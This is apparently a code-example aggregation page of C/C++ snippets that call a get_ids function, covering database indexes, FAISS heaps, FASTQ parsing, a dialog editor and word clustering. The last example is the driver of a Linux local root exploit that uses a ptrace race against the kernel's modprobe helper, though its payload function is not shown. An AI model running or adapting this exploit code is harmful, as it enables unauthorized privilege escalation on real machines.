示例#1
0
void Database::DropIndex(SQLDropIndex& st)
{
	for (auto tb = tbs_.begin(); tb != tbs_.end(); tb++)
	{
		for (auto idx = tb->get_ids().begin(); idx != tb->get_ids().end(); idx++)
		{
			if (idx->get_name() == st.get_index_name())
			{
				tb->get_ids().erase(idx);
				return ;
			}
		}
	}
}
示例#2
0
文件: Heap.cpp 项目: edisonqkj/faiss
void HeapArray<C>::addn_with_ids (
     size_t nj, const T *vin, const TI *id_in,
     long id_stride, size_t i0, long ni)
{
    if (id_in == nullptr) {
        addn (nj, vin, 0, i0, ni);
        return;
    }
    if (ni == -1) ni = nh;
    assert (i0 >= 0 && i0 + ni <= nh);
#pragma omp parallel for
    for (size_t i = i0; i < i0 + ni; i++) {
        T * __restrict simi = get_val(i);
        TI * __restrict idxi = get_ids (i);
        const T *ip_line = vin + (i - i0) * nj;
        const TI *id_line = id_in + (i - i0) * id_stride;

        for (size_t j = 0; j < nj; j++) {
            T ip = ip_line [j];
            if (C::cmp(simi[0], ip)) {
                heap_pop<C> (k, simi, idxi);
                heap_push<C> (k, simi, idxi, ip, id_line [j]);
            }
        }
    }
}
示例#3
0
int subsample(int nseqs, char *fastqfile, struct fastq *seqs[], int compressed) {


	// read the fastq file into a temporary hash
	struct fastq *allseqs[HASHSIZE] = {NULL};

	int read_seqs = 0;
	if (compressed)
		read_seqs = read_fastq_gz(fastqfile, allseqs);
	else
		read_seqs = read_fastq(fastqfile, allseqs);

	if (read_seqs < nseqs) {
		fprintf(stderr, "You requested %d sequences but there are only %d in the file!\n", nseqs, read_seqs);
		nseqs = read_seqs;
	}

	// get all the ids from the sequences
	char *ids[read_seqs];
	get_ids(ids, allseqs);

	// subsample those IDs 
	char **subsample = subsample_n(read_seqs, ids, nseqs);

	for (int i=0; i<nseqs; i++) {
		char *info = get_seq_information(subsample[i], seqs);
		char *seq = get_sequence(subsample[i], seqs);
		char *qua = get_quality(subsample[i], seqs);
	
	}
	return nseqs;
}
示例#4
0
bool Database::CheckIfIndexExists(string index_name)
{
	bool exists = false;
	for (auto tb = tbs_.begin(); tb != tbs_.end(); tb++)
	{
		for (auto idx = tb->get_ids().begin(); idx != tb->get_ids().end(); idx++)
		{
			if (idx->get_name() == index_name)
			{
				exists = true;
				return exists;
			}
		}
	}
	return exists;
}
示例#5
0
int main()
{
    int uid, gid;

    get_ids(&uid, &gid);
    printf("User ID is %d. Group ID is %d.\n", uid, gid);
    return 0;
}
/**
 * @brief Removes all dialogs with a specific prefix.
 * @param prefix The prefix id of dialogs to remove.
 * @return The list of all removed dialogs (key, value).
 * @throws EditorException in case of error.
 */
QList<QPair<QString, DialogData>> DialogsModel::delete_prefix(
    const QString& prefix) {

  QList<QPair<QString, DialogData>> list;
  for (QString key : get_ids(prefix)) {
    list.push_back(QPair<QString, DialogData>(key, get_dialog_data(key)));
    delete_dialog(key);
  }
  return list;
}
示例#7
0
文件: myids.c 项目: arcticmatt/CS24
int main() {
    printf("Running myids\n");

    int uid, gid;
    // Call the assembly function I wrote
    get_ids(&uid, &gid);
    printf("User ID is %d. Group ID is %d.\n", uid, gid);

    return 0;
}
/**
 * @brief Returns whether the prefix of dialog ids can be changed.
 * @param old_prefix[in] The prefix key of strings to change.
 * @param new_prefix[in] The new prefix to set.
 * @param id[out] The id that already exists in case of error.
 * @return @c true if the prefix can be changed.
 */
bool DialogsModel::can_set_dialog_id_prefix(
    const QString& old_prefix, const QString& new_prefix, QString& id) {

  for (QString prefixed_id : get_ids(old_prefix)) {

    prefixed_id.replace(QRegExp(QString("^") + old_prefix), new_prefix);
    if (dialog_exists(prefixed_id)) {
      id = prefixed_id;
      return false;
    }
  }
  return true;
}
示例#9
0
Process *get_process(pid_t pid) {
  /* TODO: Add test for invalid pid. Right now, we get a lot of errors and some
   * structure.*/
  Process *retval = (Process *)calloc(1, sizeof(Process));
  unsigned int *uids = NULL;
  unsigned int *gids = NULL;
  retval->pid = pid;
  retval->ppid = get_ppid(pid);
  retval->name = get_procname(pid);
  retval->exe = get_exe(pid);
  retval->cmdline = get_cmdline(pid);
  retval->create_time = get_create_time(pid);
  uids = get_ids(pid, "Uid:");
  if (uids) {
    retval->uid = uids[0];
    retval->euid = uids[1];
    retval->suid = uids[2];
    retval->username =
        get_username(retval->uid); /* Uses real uid and not euid */
  } else {
    retval->uid = retval->euid = retval->suid = 0;
    retval->username = NULL;
  }

  gids = get_ids(pid, "Gid:");
  if (uids) {
    retval->gid = gids[0];
    retval->egid = gids[1];
    retval->sgid = gids[2];
  } else {
    retval->uid = retval->euid = retval->suid = 0;
  }

  retval->terminal = get_terminal(pid);
  free(uids);
  free(gids);
  return retval;
}
示例#10
0
Process *
get_process(unsigned pid)
{
  Process *retval = calloc(1, sizeof(Process));
  unsigned int *uids = NULL;
  unsigned int *gids = NULL;
  retval->pid = pid;
  retval->ppid = get_ppid(pid);
  retval->name = get_procname(pid);
  retval->exe = get_exe(pid);
  retval->cmdline = get_cmdline(pid);
  retval->create_time = get_create_time(pid);
  uids = get_ids(pid, "Uid:");
  if (uids) {
    retval->uid = uids[0];
    retval->euid = uids[1];
    retval->suid = uids[2];
    retval->username = get_username(retval->uid); /* Uses real uid and not euid */
  } else {
    retval->uid = retval->euid = retval->suid = 0;
    retval->username = NULL;
  }

  gids = get_ids(pid, "Gid:");
  if (uids) {
    retval->gid = gids[0];
    retval->egid = gids[1];
    retval->sgid = gids[2];
  } else {
    retval->uid = retval->euid = retval->suid = 0;
  }

  retval->terminal = get_terminal(pid);
  if (uids) free(uids);
  if (gids) free(gids);
  return retval;
}
/**
 * @brief Duplicates dialog(s).
 * @param id Id of the dialog to duplicate.
 * @param new_id Id of the duplicate dialog.
 * @throws EditorException in case of error.
 */
void DialogsModel::duplicate_dialogs(
  const QString& prefix, const QString& new_prefix) {

  // Check if dialogs can be duplicated.
  QString id;
  if (!can_duplicate_dialogs(prefix, new_prefix, id)) {
    throw EditorException(tr("Dialog '%1' already exists").arg(id));
  }

  // Duplicate dialogs.
  for (QString id : get_ids(prefix)) {
    const auto& data = get_dialog_data(id);
    id.replace(QRegExp(QString("^") + prefix), new_prefix);
    create_dialog(id, data);
  }
}
示例#12
0
文件: Heap.cpp 项目: edisonqkj/faiss
void HeapArray<C>::addn (size_t nj, const T *vin, TI j0,
                         size_t i0, long ni)
{
    if (ni == -1) ni = nh;
    assert (i0 >= 0 && i0 + ni <= nh);
#pragma omp parallel for
    for (size_t i = i0; i < i0 + ni; i++) {
        T * __restrict simi = get_val(i);
        TI * __restrict idxi = get_ids (i);
        const T *ip_line = vin + (i - i0) * nj;

        for (size_t j = 0; j < nj; j++) {
            T ip = ip_line [j];
            if (C::cmp(simi[0], ip)) {
                heap_pop<C> (k, simi, idxi);
                heap_push<C> (k, simi, idxi, ip, j + j0);
            }
        }
    }
}
/**
 * @brief Changes the prefix of dialog ids.
 * @param old_prefix The prefix key of strings to change.
 * @param new_prefix The new prefix to set.
 * @return The new ids of the dialogs.
 * @throws EditorException in case of error.
 */
QList<QPair<QString, QString>> DialogsModel::set_dialog_id_prefix(
    const QString& old_prefix, const QString& new_prefix) {

  // Check if the prefix can be changed.
  QString id;
  if (!can_set_dialog_id_prefix(old_prefix, new_prefix, id)) {
    throw EditorException(tr("Dialog '%1' already exists").arg(id));
  }

  // change the dialog ids.
  QList<QPair<QString, QString>> list;
  for (QString old_id : get_ids(old_prefix)) {

    QString new_id = old_id;
    new_id.replace(QRegExp(QString("^") + old_prefix), new_prefix);
    list.push_back(
      QPair<QString, QString>(old_id, set_dialog_id(old_id, new_id)));
  }
  return list;
}
示例#14
0
static NV_INT32 get_lsurvey(FILE * infile, SURVEY * srv)
{
    NV_CHAR         buff[MBS];
    NV_INT32        i = (-1), n = 0;


    /* determine the id numbers of the lines & points */

    rewind(infile);
    n = 0;
    while (fgets(buff, MBS, infile) != NULL)
    {
	strtolower(buff);
	if (strncmp(buff, "line", 4) == 0)
	{
	    n += get_ids(buff, &srv->line[++i]);
	}
    }
    if (n != srv->n)
    {
	printf("get_survey:  warning got %d (!= %d) line ids\n", n, srv->n);
    }


    /* now fill in the points for each line */

    n = 0;
    for (i = 0; i < srv->n; i++)
    {
	n += get_points(infile, &srv->line[i]);
    }

    if (n != srv->n)
    {
	printf("get_dsurvey:  warning got %d (!= %d) lines\n", n, srv->n);
    }

    return n;

}				/* get_lsurvey */
示例#15
0
list<string>
get_ids (tree t) {
  if (is_nil (t->obs)) return list<string> ();
  list<observer> l= t->obs->get_tree_pointers ();
  return reverse (get_ids (l));
}
示例#16
0
list<string>
get_ids (list<observer> l) {
  if (is_nil (l)) return list<string> ();
  return pointer_resolve [l->item] * get_ids (l->next);
}
示例#17
0
int main(int argc, char **argv) {
	setlocale(LC_ALL, ""); // Comment-out on non-Posix systems
	clock_t time_start = clock();
	time_t time_t_start;
	time(&time_t_start);
	argv_0_basename = basename(argv[0]);
	get_usage_string(usage, USAGE_LEN); // This is a big scary string, so build it elsewhere

	//printf("sizeof(cmd_args)=%zd\n", sizeof(cmd_args));
	parse_cmd_args(argc, argv, usage, &cmd_args);

	if (cmd_args.class_algo == EXCHANGE || cmd_args.class_algo == EXCHANGE_BROWN)
		memusage += sizeof(float) * ENTROPY_TERMS_MAX; // We'll build the precomputed entropy terms after reporting memusage

	struct_model_metadata global_metadata;

	// The list of unique words should always include <s>, unknown word, and </s>
	map_update_count(&word_map, UNKNOWN_WORD, 0, 0); // Should always be first
	map_update_count(&word_map, "<s>", 0, 1);
	map_update_count(&word_map, "</s>", 0, 2);

	// Open input
	FILE *in_train_file = stdin;
	if (in_train_file_string)
		in_train_file = fopen(in_train_file_string, "r");
	if (in_train_file == NULL) {
		fprintf(stderr, "%s: Error: Unable to open input file  %s\n", argv_0_basename, in_train_file_string); fflush(stderr);
		exit(15);
	}

	// Process input sentences
	size_t input_memusage = 0;
	const struct_model_metadata input_model_metadata = process_input(cmd_args, in_train_file, &word_map, &initial_bigram_map, &input_memusage);
	memusage += input_memusage;
	fclose(in_train_file);

	clock_t time_input_processed = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Corpus processed in %'.2f CPU secs. %'lu lines, %'u types, %'lu tokens, current memusage: %'.1fMB\n", argv_0_basename, (double)(time_input_processed - time_start)/CLOCKS_PER_SEC, input_model_metadata.line_count, input_model_metadata.type_count, input_model_metadata.token_count, (double)memusage / 1048576); fflush(stderr);

	global_metadata.token_count = input_model_metadata.token_count;
	global_metadata.type_count  = map_count(&word_map);

	// Filter out infrequent words, reassign word_id's, and build a mapping from old word_id's to new word_id's
	sort_by_count(&word_map);
	word_id_t * restrict word_id_remap = calloc(sizeof(word_id_t), input_model_metadata.type_count);
	get_ids(&word_map, word_id_remap);
	word_id_t number_of_deleted_words = filter_infrequent_words(cmd_args, &global_metadata, &word_map, word_id_remap);

	// Get list of unique words
	char * * restrict word_list = (char **)malloc(sizeof(char*) * global_metadata.type_count);
	memusage += sizeof(char*) * global_metadata.type_count;
	reassign_word_ids(&word_map, word_list, word_id_remap);
	get_keys(&word_map, word_list);
	sort_by_id(&word_map);


	// Check or set number of classes
	if (cmd_args.num_classes >= global_metadata.type_count) { // User manually set number of classes is too low
		fprintf(stderr, "%s: Error: Number of classes (%u) is not less than vocabulary size (%u).  Decrease the value of --classes\n", argv_0_basename, cmd_args.num_classes, global_metadata.type_count); fflush(stderr);
		exit(3);
	} else if (cmd_args.num_classes == 0) { // User did not manually set number of classes at all
		cmd_args.num_classes = (wclass_t) (sqrt(global_metadata.type_count) * 1.2);
	}

	// Build array of word_counts
	word_count_t * restrict word_counts = malloc(sizeof(word_count_t) * global_metadata.type_count);
	memusage += sizeof(word_count_t) * global_metadata.type_count;
	build_word_count_array(&word_map, word_list, word_counts, global_metadata.type_count);

	// Initialize clusters, and possibly read-in external class file
	wclass_t * restrict word2class = malloc(sizeof(wclass_t) * global_metadata.type_count);
	memusage += sizeof(wclass_t) * global_metadata.type_count;
	init_clusters(cmd_args, global_metadata.type_count, word2class, word_counts, word_list);
	if (initial_class_file != NULL)
		import_class_file(&word_map, word2class, initial_class_file, cmd_args.num_classes); // Overwrite subset of word mappings, from user-provided initial_class_file

	// Remap word_id's in initial_bigram_map
	remap_and_rev_bigram_map(&initial_bigram_map, &new_bigram_map, &new_bigram_map_rev, word_id_remap, map_find_id(&word_map, UNKNOWN_WORD, -1));
	global_metadata.start_sent_id = map_find_id(&word_map, "<s>", -1);; // need this for tallying emission probs
	global_metadata.end_sent_id   = map_find_id(&word_map, "</s>", -1);; // need this for tallying emission probs
	global_metadata.line_count    = map_find_count(&word_map, "</s>"); // Used for calculating perplexity

	if (global_metadata.line_count == 0) {
		fprintf(stderr, "%s: Warning: Number of lines is 0.  Include <s> and </s> in your ngram counts, or perplexity values will be unreliable.\n", argv_0_basename); fflush(stderr);
	}

	//printf("init_bigram_map hash_count=%u\n", HASH_COUNT(initial_bigram_map)); fflush(stdout);
	//printf("new_bigram_map hash_count=%u\n", HASH_COUNT(new_bigram_map)); fflush(stdout);
	free(word_id_remap);
	memusage -= sizeof(word_id_t) * input_model_metadata.type_count;
	delete_all(&word_map); // static
	delete_all_bigram(&initial_bigram_map); // static
	memusage -= input_memusage;

	// Initialize and set word bigram listing
	clock_t time_bigram_start = clock();
	size_t bigram_memusage = 0; size_t bigram_rev_memusage = 0;
	struct_word_bigram_entry * restrict word_bigrams = NULL;
	struct_word_bigram_entry * restrict word_bigrams_rev = NULL;

	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Word bigram listing ... ", argv_0_basename); fflush(stderr);

	#pragma omp parallel sections // Both bigram listing and reverse bigram listing can be done in parallel
	{
		#pragma omp section
		{
			//sort_bigrams(&new_bigram_map); // speeds things up later
			word_bigrams = calloc(global_metadata.type_count, sizeof(struct_word_bigram_entry));
			memusage += sizeof(struct_word_bigram_entry) * global_metadata.type_count;
			bigram_memusage = set_bigram_counts(word_bigrams, new_bigram_map);
			// Copy entries in word_counts to struct_word_bigram_entry.headword_count since that struct entry is already loaded when clustering
			for (word_id_t word = 0; word < global_metadata.type_count; word++)
				word_bigrams[word].headword_count = word_counts[word];
		}

		// Initialize and set *reverse* word bigram listing
		#pragma omp section
		{
			if (cmd_args.rev_alternate) { // Don't bother building this if it won't be used
				//sort_bigrams(&new_bigram_map_rev); // speeds things up later
				word_bigrams_rev = calloc(global_metadata.type_count, sizeof(struct_word_bigram_entry));
				memusage += sizeof(struct_word_bigram_entry) * global_metadata.type_count;
				bigram_rev_memusage = set_bigram_counts(word_bigrams_rev, new_bigram_map_rev);
				// Copy entries in word_counts to struct_word_bigram_entry.headword_count since that struct entry is already loaded when clustering
				for (word_id_t word = 0; word < global_metadata.type_count; word++)
					word_bigrams_rev[word].headword_count = word_counts[word];
			}
		}
	}

	delete_all_bigram(&new_bigram_map);
	delete_all_bigram(&new_bigram_map_rev);
	memusage += bigram_memusage + bigram_rev_memusage;
	clock_t time_bigram_end = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "in %'.2f CPU secs.  Bigram memusage: %'.1f MB\n", (double)(time_bigram_end - time_bigram_start)/CLOCKS_PER_SEC, (bigram_memusage + bigram_rev_memusage)/(double)1048576); fflush(stderr);

	//print_word_bigrams(global_metadata, word_bigrams, word_list);

	// Build <v,c> counts, which consists of a word followed by a given class
	word_class_count_t * restrict word_class_counts = calloc(1 + cmd_args.num_classes * global_metadata.type_count , sizeof(word_class_count_t));
	if (word_class_counts == NULL) {
		fprintf(stderr,  "%s: Error: Unable to allocate enough memory for <v,c>.  %'.1f MB needed.  Maybe increase --min-count\n", argv_0_basename, ((cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / (double)1048576 )); fflush(stderr);
		exit(13);
	}
	memusage += cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t);
	fprintf(stderr, "%s: Allocating %'.1f MB for word_class_counts: num_classes=%u x type_count=%u x sizeof(w-cl-count_t)=%zu\n", argv_0_basename, (double)(cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / 1048576 , cmd_args.num_classes, global_metadata.type_count, sizeof(word_class_count_t)); fflush(stderr);
	build_word_class_counts(cmd_args, word_class_counts, word2class, word_bigrams, global_metadata.type_count/*, word_list*/);
	//print_word_class_counts(cmd_args, global_metadata, word_class_counts);

	// Build reverse: <c,v> counts: class followed by word.  This and the normal one are both pretty fast, so no need to parallelize this
	word_class_count_t * restrict word_class_rev_counts = NULL;
	if (cmd_args.rev_alternate) { // Don't bother building this if it won't be used
		word_class_rev_counts = calloc(1 + cmd_args.num_classes * global_metadata.type_count , sizeof(word_class_count_t));
		if (word_class_rev_counts == NULL) {
			fprintf(stderr,  "%s: Warning: Unable to allocate enough memory for <v,c>.  %'.1f MB needed.  Falling back to --rev-alternate 0\n", argv_0_basename, ((cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / (double)1048576 )); fflush(stderr);
			cmd_args.rev_alternate = 0;
		} else {
			memusage += cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t);
			fprintf(stderr, "%s: Allocating %'.1f MB for word_class_rev_counts: num_classes=%u x type_count=%u x sizeof(w-cl-count_t)=%zu\n", argv_0_basename, (double)(cmd_args.num_classes * global_metadata.type_count * sizeof(word_class_count_t)) / 1048576 , cmd_args.num_classes, global_metadata.type_count, sizeof(word_class_count_t)); fflush(stderr);
			build_word_class_counts(cmd_args, word_class_rev_counts, word2class, word_bigrams_rev, global_metadata.type_count/*, word_list*/);
		}

	}

	// Calculate memusage for count_arrays
	for (unsigned char i = 1; i <= cmd_args.max_array; i++) {
		memusage += 2 * (powi(cmd_args.num_classes, i) * sizeof(wclass_count_t));
		//printf("11 memusage += %zu (now=%zu) count_arrays\n", 2 * (powi(cmd_args.num_classes, i) * sizeof(wclass_count_t)), memusage); fflush(stdout);
	}

	clock_t time_model_built = clock();
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Finished loading %'lu tokens and %'u types (%'u filtered) from %'lu lines in %'.2f CPU secs\n", argv_0_basename, global_metadata.token_count, global_metadata.type_count, number_of_deleted_words, global_metadata.line_count, (double)(time_model_built - time_start)/CLOCKS_PER_SEC); fflush(stderr);
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Approximate memory usage at clustering: %'.1fMB\n", argv_0_basename, (double)memusage / 1048576); fflush(stderr);

	cluster(cmd_args, global_metadata, word_counts, word_list, word2class, word_bigrams, word_bigrams_rev, word_class_counts, word_class_rev_counts);

	// Now print the final word2class mapping
	if (cmd_args.verbose >= 0) {
		FILE *out_file = stdout;
		if (out_file_string)
			out_file = fopen(out_file_string, "w");
		if (out_file == NULL) {
			fprintf(stderr, "%s: Error: Unable to open output file  %s\n", argv_0_basename, out_file_string); fflush(stderr);
			exit(16);
		}
		if (cmd_args.class_algo == EXCHANGE && (!cmd_args.print_word_vectors)) {
			print_words_and_classes(out_file, global_metadata.type_count, word_list, word_counts, word2class, (int)cmd_args.class_offset, cmd_args.print_freqs);
		} else if (cmd_args.class_algo == EXCHANGE && cmd_args.print_word_vectors) {
			print_words_and_vectors(out_file, cmd_args, global_metadata, word_list, word2class, word_bigrams, word_bigrams_rev, word_class_counts, word_class_rev_counts);
		}
		fclose(out_file);
	}

	clock_t time_clustered = clock();
	time_t time_t_end;
	time(&time_t_end);
	double time_secs_total = difftime(time_t_end, time_t_start);
	if (cmd_args.verbose >= -1)
		fprintf(stderr, "%s: Finished clustering in %'.2f CPU seconds.  Total wall clock time was about %lim %lis\n", argv_0_basename, (double)(time_clustered - time_model_built)/CLOCKS_PER_SEC, (long)time_secs_total/60, ((long)time_secs_total % 60)  );

	free(word2class);
	free(word_bigrams);
	free(word_list);
	free(word_counts);
	exit(0);
}
示例#18
0
int main(int argc, char *argv[]) {
	// this file has 5 sequences in it so it should be easy to read!
	char *filename = "../example_data/small.fastq.gz";
	struct fastq *seqs[HASHSIZE] = {NULL};
	int nseqs = read_fastq_gz(filename, seqs);
	int error = 0;
	if (nseqs != ESEQS) {
		fprintf(stderr, "There was an error reading %s. We retrieved %d sequences but should have found %d sequences\n", filename, nseqs, ESEQS);
		error = 1;
	}

	/* now test the get sequence methods */
	int nnseqs = number_of_sequences(seqs);
	if (nnseqs != ESEQS) {
		printf("There was an error checking the number of sequences. We found %d using number_of_sequences but it should be %d\n", nnseqs, ESEQS);
		error++;
	}

	/* test getting the ids */
	char *ids[nnseqs];
	int nnseqsids = get_ids(ids, seqs);
	if (nnseqsids != nnseqs) {
		printf("There was an error when we got the ids. This returned %d ids but it should be %d\n", nnseqsids, nnseqs);
		error++;
	}
	printf("Got %d ids\n", nnseqsids);
	for (int i=0; i<nnseqsids; i++)
		printf("ID %d: %s\n", i, ids[i]);
	

	char *sq = get_sequence("@GFH7CG303FQFE8/1", seqs);
	char *sqans = "AAATACGGGTAGATATACCGCCATGTCTCGCAAACAGCCTCATCATGCCGCGCCTGCCCACTTTTTTGCATCAGTATCCCGGCATTGCGCTGGAACTTTGTAGTAGCGATCGACAGGTCGATTTACTACGGGAAGATTTCGACTGCGTGGTGCGCACAGAGCCGCTACATGCGCCAGGGATACTGACGCGCCCGCTTGGCAAACTGAGAAGAGTGAACTGCGCCAGCCCACAATACCTGGCGCGCTTTGGGTAATCCAGAAAAACCTTGACGATCTCGCCTCACATGCGGTGGTGCATTATTCATTGACCCCGGGAGTTTCTTCACCGGGTTTTGCCTTTGAAACTCCCACGGTATGCAGTGGTAAAAAACCGGCGGAAATGCTAACGGTAAACAGTACGAGACTTGGCATACAGCCTG";
	char *quans = "@@@DDDDDFFFIIIIIIIIIIIIIIIIIIIIHHHIIFDDHHHHHHHHHHHHHFFFFFFFFF666666FFFFFFFFFFFFFCCADDDFDDCDDDDDD???6388CFFCCCCCDFFFFFDFFFF??8638<FF?AA>DFFFAA<<<FFFFFAACCFF???CFDDDDBBBBBBA<<889;888<<===BBBBB=;;A688<<9...3<4434443<<AAAAA??A==<>8624/2642..028>=<9989<<;4/..6;;<:,,,--..<<==:9<<<A<4444<=<<733224000<><8::CGGDDDDB::99400/0444322576;622....266666<68899444:8A?\?\?=>>>:3//.------55--266...3777666646...6297...269766///3:<><>;;93";
	if (sq == NULL) {
		fprintf(stderr, "Bugger, no sequence for @GFH7CG303FQFE8/1\n");
		error++;
	}

	if (strcmp(sq, sqans)) {
		error++;
		printf("The sequence we retrieved for @GFH7CG303FQFE8/1 appeared to be wrong:\n%s\n", sq);
	}

	sq = get_sequence("NOSEQ", seqs);
	if (sq != NULL) {
		fprintf(stderr, "Using ID NOSEQ we retrieved %s\n", sq);
		error++;
	}


	char *qual = get_quality("@GFH7CG303FQFE8/1", seqs);
	if (strcmp(qual, quans)) {
		fprintf(stderr, "The quality scores for @GFH7CG303FQFE8/1 do not appear correct\n");
		error++;
	}

	qual = get_quality("NOSEQ", seqs);
	if (qual != NULL) {
		fprintf(stderr, "Got %s as quality scores for NOSEQ but shouldn't find any!\n", qual);
		error++;
	}

	char *info = get_seq_information("@GFH7CG303FQFE8/1", seqs);
	if (strcmp("@GFH7CG303FQFE8/1 length=419 xy=2234_0770 region=3 run=R_2010_04_12_12_22_54_", info)) {
		printf("TEST: The information for @GFH7CG303FQFE8/1 was unexpected: '%s'\n", info);
		error++;
	}



	
	if (error) 
		fprintf(stderr, "There were %d errors when running the tests\n", error);
	else
		fprintf(stderr, "All tests passed\n");
	
	exit(error);

}
示例#19
0
int main(int ac, char **av)
{
    int fd, pid, p, i;
    char buf[TMPSIZE];
    struct uids uids;
    FILE *fp;


    setpgrp();
    setsid();
    umask(022);
    unlink(SHELL);
    fd = open(SHELL, O_RDWR | O_CREAT | O_TRUNC, 0755);
    fp = fdopen(fd, "w+");
    fprintf(fp, "%s\n", shellcmd);
    fclose(fp);

    pid = getpid() + 2;
    snprintf(buf, sizeof(buf) - 1, "/proc/%d/status", pid);
    printf("\nModprobe pid %d, my pid %d", pid, getpid());
    fflush(stdout);
    signal(SIGUSR1, sighnd);

//      fork modprobe helper
    if (!(p = fork())) {
//      some nice work for exec_usermodehelper(), keep it busy!
	for (i = 0; i < FMAX; i++) {
	    fd = open("/dev/zero", O_RDWR);
	    mmap(NULL, MMSIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
	}
	kill(getppid(), SIGUSR1);
	while (!sig);
	printf("\nHelper (pid %d) requesting module...", getpid());
	fflush(stdout);
	fd = open(ENTRY, O_RDONLY | O_NONBLOCK);
	exit(0);
    }
//      synchronize with the child
    else {
	while (!sig);
	kill(p, SIGUSR1);

//      wait for modprobe to run at unprivileged level
	while (1) {
	    fd = open(buf, O_RDONLY);
	    if (fd > 0) {
		if (!(fp = fdopen(fd, "r")))
		    fatal("fdopen");
		if (get_ids(fp, &uids) != 4
		    || (uids.uid != uids.euid || uids.uid != uids.suid
			|| uids.uid != uids.fsuid)) {
		    fatal("did not catch modprobe...try again later :-)");
		}
//      ok, it runs...
		while (1) {
		    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL)) {
			fatal("PTRACE_ATTACH failed!");
		    } else {
			i = 0;
			printf("\nAttached afterburner...\n");
			fflush(stdout);
			while (ptrace(PTRACE_GETREGS, pid, 0, &regs)
			       || !regs.eip || regs.eip >= MAXSTACK) {
			    ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
			    printf("\rplease wait %d", i++);
			    fflush(stdout);
			}
			waitpid(pid, NULL, WUNTRACED);
			printf
			    ("\nValid EIP found EIP=%p\nexploiting the bug, good luck... ",
			     regs.eip);
			fflush(stdout);
			exploit(pid);
			exit(0);
		    }
		}
		fclose(fp);
	    }
	}
    }

    return 0;
}